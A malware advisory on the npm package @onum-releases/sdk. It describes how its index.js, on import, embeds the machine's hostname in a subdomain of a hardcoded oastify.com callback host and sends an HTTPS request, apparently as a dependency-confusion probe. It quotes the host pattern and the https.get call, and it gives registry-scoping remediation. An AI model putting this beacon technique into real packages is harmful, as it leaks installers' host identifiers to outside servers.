MAL-2026-6125
Malicious code in @onum-releases/sdk (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cae207a349e4bda9359f4981d60ec81d9492cd8624535ee01b44c8f3bf3b3208)

On import, index.js reads the installing machine's hostname via os.hostname(), embeds it as a subdomain of a hardcoded *.oastify.com (Burp Collaborator out-of-band callback) host, and issues an HTTPS GET to that host. Specifically, index.js lines 5-7 build `sdk.<hostname>.200majoeu01dk02xnjdajro1isojc90y.oastify.com` and call `https.get({ host: host, path: '/sdk',... })`. The request fires unconditionally on `require('@onum-releases/sdk')` with no caller consent, leaking the installer's hostname to whoever controls that Collaborator instance. Because the hostname is encoded in the subdomain, the DNS resolution alone already exfiltrates it, even where outbound HTTPS is blocked; the HTTPS GET then confirms a working egress path. The package's own description says 'Security PoC placeholder - benign, no runtime payload', but the shipped code does run an import-time beacon. The `@onum-releases` scope plus PoC framing is consistent with a dependency-confusion probe against an internal `onum` namespace; the harm to any installer who pulls it (intentionally or via name confusion) is host-identifier exfiltration to a third-party OAST server.
Affected packages
No fixed version published yet for @onum-releases/sdk (npm). Pin to a known-safe version or switch to an alternative. If `@onum-releases` is an internal scope in your organisation, confirm the scope is mapped to your private registry (for example via a scoped `registry` entry in `.npmrc`) so the public package cannot be resolved in its place.